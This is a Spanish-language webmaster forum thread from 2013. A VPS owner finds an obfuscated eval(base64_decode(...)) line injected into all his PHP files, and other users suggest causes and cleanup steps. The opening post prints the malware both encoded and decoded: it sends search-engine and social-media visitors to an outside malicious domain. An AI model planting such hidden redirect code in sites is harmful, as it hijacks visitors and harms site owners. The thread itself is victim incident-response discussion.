Consulta VPS (Creo tener un virus)

Makoto Yuki · 2013-08-29T12:14:06-0500

Hola gente,
Queria pedirles asesoramiento en este tema,
Desde hace 2 semanas aparece un codigo en mis webs (Solo en Archivos PHP)
En todas sin excepcion x.x

Osea en todas las funciones php sale esto:

Insertar CODE, HTML o PHP:

eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tL2wiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsKaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSBhbmQgIXN0cmlzdHIoJHJlZmVyZXIsIkVlWXAzRDciKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly91ZW5ka2drdy5kZG5zLm1lLnVrLyIpOwpleGl0KCk7Cn0KfQp9Cn0KfQ=="));

Que es basecode64 desencriptado es:

Insertar CODE, HTML o PHP:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){
header("Location: http://uendkgkw.ddns.me.uk/");
exit();
}
}
}
}
}

Y queria saber si a alguno le ha pasado? y si es asi como hicieron para borrarlo definitivo de sus webs

??

Lamentablemente esto me anda arruinando visitas de facebook,google,yahoo,bing y de varios sitios como ven :/

Y pues ya hable con soporte de mi VPS y como no tengo contratado el servicio de administracion no me quieren ayudar.

Lo curioso es que salio cuando acabe de pagar este mes (Mas o menos por el 21 de agosto)

Queria saber si me pueden asesorar para borrar el virus definitivamente o si me recomiendan cambiarme de server (Uso VPS de LinoVPS)

Y la verdad andaba vastante bien con esta empresa pero viendo esto ya no se que decir.

SenciNet · 2013-08-29T12:17:11-0500

Es posible que tu CMS tenga algún agujero de seguridad, que hace que inyecten código, te recomendaría, lo actualizaras ( incluido los módulos ), revisaras los permisos de los archivos, y pasaras algún antivirus al servidor completo, sino te lo hace LinoVPS, tendrás que hacerlo tú, o buscar algún proveedor que lo realice.

Un saludo

Makoto Yuki · 2013-08-29T12:20:41-0500

SenciNet dijo:
Es posible que tu CMS tenga algún agujero de seguridad, que hace que inyecten código, te recomendaría, lo actualizaras ( incluido los módulos ), revisaras los permisos de los archivos, y pasaras algún antivirus al servidor completo, sino te lo hace LinoVPS, tendrás que hacerlo tú, o buscar algún proveedor que lo realice.

Un saludo

No uso CMS uso un script php en todas mis webs a excepcion de una que es wordpress pero anda actualizada hasta la ultima version.
Como paso un antivirus al server?

No conoces algun sysadmin que pueda checarlo?

OscarS · 2013-08-29T14:04:46-0500

Te han invadido el sistema, lo mas probable que fuera por el wordpress y tienes un codigo malicioso que redirecciona a un sitio si viene de x referido.

Busca donde esta el shell y remuevelo asi podras limpiar el codigo inyectado.

Saludos.

Makoto Yuki · 2013-08-29T15:46:25-0500

OscarS dijo:
Te han invadido el sistema, lo mas probable que fuera por el wordpress y tienes un codigo malicioso que redirecciona a un sitio si viene de x referido.

Busca donde esta el shell y remuevelo asi podras limpiar el codigo inyectado.

Saludos.

Buenas bro crees poderlo checar,
Vos no soy bueno checando y no se como ver donde esta el shell :S
Dime cuanto me cobrarias pero porfavor ayudame

OscarS · 2013-08-29T15:48:19-0500

Makoto Yuki dijo:
Buenas bro crees poderlo checar,
Vos no soy bueno checando y no se como ver donde esta el shell :S
Dime cuanto me cobrarias pero porfavor ayudame

Enviame un mp con tu skype y te lo reviso sin compromiso.

Saludos.

Makoto Yuki · 2013-08-29T16:01:26-0500

OscarS dijo:
Enviame un mp con tu skype y te lo reviso sin compromiso.

Saludos.

MP Enviado

skamasle · 2013-08-29T16:04:30-0500

Desde cpanel puedes escanear con clamav, aunque si tienes muchos archivos infectados como das a entender es mejor usar 2 o 3 anti malwars para ver eso y encontrar todos los archivos infectados, cambiar de empresa no soluciona nada como ya has dicho no tienes administración contratada te puede pasar lo mismo en otro sitio más si el culpable fue algún script, theme, plugin etc :/